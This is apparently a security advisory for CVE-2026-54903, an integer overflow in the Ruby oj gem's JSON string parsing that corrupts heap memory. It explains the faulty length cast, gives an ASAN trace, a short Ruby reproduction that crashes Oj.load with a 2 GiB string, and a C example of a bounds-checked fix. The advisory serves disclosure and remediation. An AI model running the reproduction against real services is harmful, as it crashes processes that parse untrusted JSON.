PT-2026-51089 · Rubygems · Oj
Published 2026-06-19 · Updated 2026-06-19 · CVE-2026-54903
CVSS v4.0: 8.7 (High)
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N |
Summary
Oj.load is vulnerable to heap corruption when parsing a JSON string longer than 2 GB. An integer overflow in buf_append_string (buf.h:61) truncates the string length to a negative 32-bit int; the caller casts that value to size_t, producing a length of roughly 2^64 bytes, so memcpy copies an astronomically large amount of data out of bounds. This crashes the process and can corrupt adjacent heap memory.
Version
- Software: oj gem
- Affected: all versions with ext/oj/buf.h and ext/oj/parse.c
- Latest tested: 3.17.1 (confirmed present)
Details
ext/oj/buf.h, line 61:

```c
inline static void buf_append_string(Buf buf, const char *s, size_t slen) {
    // ...
    memcpy(buf->tail, s, slen); // slen derived from a 32-bit int that wrapped negative
}
```

In parse.c, escape sequence handling computes the remaining string length as an int:

```c
// parse.c:402 (read_escaped_str)
int slen = (int)(s - str);                 // wraps to negative when the string is > 2 GB
buf_append_string(buf, str, (size_t)slen); // (size_t)(-2147483648) = 0xFFFFFFFF80000000 on 64-bit
```

The pointer difference `s - str` is a ptrdiff_t; narrowing it to int drops the upper bits, so a payload of 2^31 bytes or more before the escape yields a negative slen, and the cast back to size_t turns that into a length memcpy cannot satisfy.

ASAN report:
```
==399019==ERROR: AddressSanitizer: negative-size-param: (size=-2147483648)
    #0 __asan_memcpy
    #1 buf_append_string /ext/oj/buf.h:61
    #2 read_escaped_str /ext/oj/parse.c:402
    #3 read_str /ext/oj/parse.c:542
    #4 oj_parse2 /ext/oj/parse.c:882
    #5 oj_pi_parse /ext/oj/parse.c:1256
    #6 oj_object_parse /ext/oj/object.c:701
    #7 load /ext/oj/oj.c:1259
0x7f5a26ff0801 is located 1 bytes inside of 2147483657-byte region [0x7f5a26ff0800,0x7f5aa6ff0809)
```
Reproduce
```ruby
require 'oj'

# Needs several GB of RAM: the 2 GiB payload plus the concatenated copy.
n = 1 << 31                      # 2 GiB, so (s - str) in read_escaped_str exceeds INT_MAX
json = '"' + ('A' * n) + '\\n"'  # >2 GB JSON string followed by a trailing escape sequence
Oj.load(json)                    # the escape forces the read_escaped_str path with a wrapped slen
```
Fix
Integer Overflow
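The page carries no patch, so the following is an added example, not oj's code and not the advisory author's, that puts the faulty length computation from parse.c beside a checked one. The `Buf` struct, `vuln_slen`, `checked_slen`, `buf_append_checked` and `demo_append` are hypothetical names chosen for the example; only the `(int)(s - str)` then `(size_t)` pattern comes from the advisory. It reproduces the wrapped length arithmetically (no 2 GB allocation) and shows that a length kept in size_t and bounded by the destination's remaining capacity never reaches memcpy with an impossible size.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for oj's output buffer (field names are assumptions). */
typedef struct {
    char *head; /* start of storage              */
    char *tail; /* next free byte                */
    char *end;  /* one past the last usable byte */
} Buf;

/* The advisory's pattern: a pointer difference is narrowed to int, then widened to
 * size_t. For diff == 2^31 the int is INT_MIN on GCC/Clang and the size_t becomes
 * 2^64 - 2^31, which memcpy would take as its length. */
size_t vuln_slen(ptrdiff_t diff) {
    int slen = (int)diff;
    return (size_t)slen;
}

/* Checked version: never narrow, reject negative differences, and refuse any chunk
 * larger than the space left in the destination. Returns 0 and sets *out on success,
 * -1 on rejection. */
int checked_slen(ptrdiff_t diff, size_t capacity_left, size_t *out) {
    if (diff < 0) return -1;
    size_t slen = (size_t)diff;
    if (slen > capacity_left) return -1;
    *out = slen;
    return 0;
}

/* Append that only ever calls memcpy with a length that fits in the buffer. */
int buf_append_checked(Buf *buf, const char *s, ptrdiff_t diff) {
    size_t slen;
    if (checked_slen(diff, (size_t)(buf->end - buf->tail), &slen) != 0) return -1;
    memcpy(buf->tail, s, slen);
    buf->tail += slen;
    return 0;
}

/* Drive buf_append_checked against a small stack buffer with an attacker-controlled
 * claimed length. Returns bytes appended, or -1 if the append was rejected. The source
 * chunk is constructed here (256 'A's); a real parser would point into the JSON text. */
long demo_append(ptrdiff_t claimed_diff, size_t capacity) {
    char storage[256];
    char chunk[256];
    if (capacity > sizeof storage) return -1;
    memset(chunk, 'A', sizeof chunk);
    Buf b = { storage, storage, storage + capacity };
    if (buf_append_checked(&b, chunk, claimed_diff) != 0) return -1;
    return (long)(b.tail - b.head);
}

int main(void) {
    ptrdiff_t two_gib = (ptrdiff_t)1 << 31;
    printf("vulnerable slen for a 2 GiB difference: %zu bytes (ASAN prints it as %d)\n",
           vuln_slen(two_gib), (int)two_gib);
    printf("checked append of 100 bytes into 128: %ld\n", demo_append(100, 128));
    printf("checked append of 2 GiB into 128: %ld\n", demo_append(two_gib, 128));
    return 0;
}
```

Until a fixed release is available, callers can apply the same bound one layer up by refusing to pass documents of 2 GB or more to Oj.load, since the wrap needs at least 2^31 bytes before an escape sequence inside a single string.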
Weakness Enumeration
Related Identifiers
Affected Products
Oj